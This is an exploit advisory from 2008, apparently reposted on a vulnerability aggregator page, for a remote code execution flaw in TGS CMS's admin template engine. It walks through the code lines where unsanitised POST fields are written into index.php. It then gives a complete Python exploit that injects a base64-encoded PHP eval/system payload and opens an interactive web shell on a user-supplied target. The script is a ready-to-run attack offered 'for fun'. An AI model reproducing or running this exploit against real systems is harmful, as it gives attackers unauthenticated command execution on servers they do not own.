Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20287
HistoryAug 04, 2008 - 12:00 a.m.

TGS CMS Remote Code Execution Exploit

2008-08-0400:00:00
vulners.com
27

TGS CMS Remote Code Execution Exploit

by 0in

from Dark-Coders Group!

www.dark-coders.pl

Contact: 0in(dot)email[at]gmail(dot)com

Greetings to:die_angel,suN8Hclf,m4r1usz,cOndemned,str0ke

Dork:NULL - because "You cannot kill what you did not create" <- Duality by Slipknot

Let's analyze the vuln:

We've got the: /cms/admin/admin.template_engine.php

first line:"<?"

next 2-22 lines - comments

23: if ($_GET['option'] == "set_template") {

24: $filename = "…/index.php";

25: if ((@is_writeable($filename)) && ($handle = @fopen($filename, "w"))) {

From 50 line to 88 we have definition of file content

50: $content = '<?php // here programmer define the file to save in "…/index.php"

but…

he… don't think xD

77:$tgs_template->template_dir = "'.$_POST['template_dir'].'";

78:$tgs_template->config_dir = "'.$_POST['config_dir'].'";

79:$tgs_template->cms_dir = "'.$_POST['cms_dir'].'";

80:$tgs_template->left_delimiter = "'.$_POST['left_delimiter'].'";

81:$tgs_template->right_delimiter = "'.$_POST['right_delimiter'].'";

And… boom!

89: if (@fwrite($handle,$content)) {

Just simply exploit for fun:

import httplib
import urllib
print "TGS CMS Remote Code Execution Exploit"
print "by 0in From Dark-Coders Group"
print "www.dark-coders.pl"
print 'Enter target:'
target=raw_input()
print 'Enter path:'
path=raw_input()
inject="\";error_reporting(0);eval(base64_decode(\"JGNtZD0kX0dFVFsnenVvJ107c3lzdGVtKCRjbWQpO2V4aXQ7\"));//"
exploit=httplib.HTTPConnection(target+':80')
headers={'Content-type':'application/x-www-form-urlencoded',"Accept":"text/plain"}
data=urllib.urlencode({'right_delimiter':inject})
exploit.request("POST",path+"/cms/admin/admin.template_engine.php?option=set_template",data,headers)
print exploit.getresponse().read()
while(1):
cmd=raw_input("[shell@"+target+"]#")
if(cmd=='exit'):
quit()
shell=httplib.HTTPConnection(target+':80')
shell.request("GET",path+"/cms/index.php?zuo="+cmd)
print shell.getresponse().read()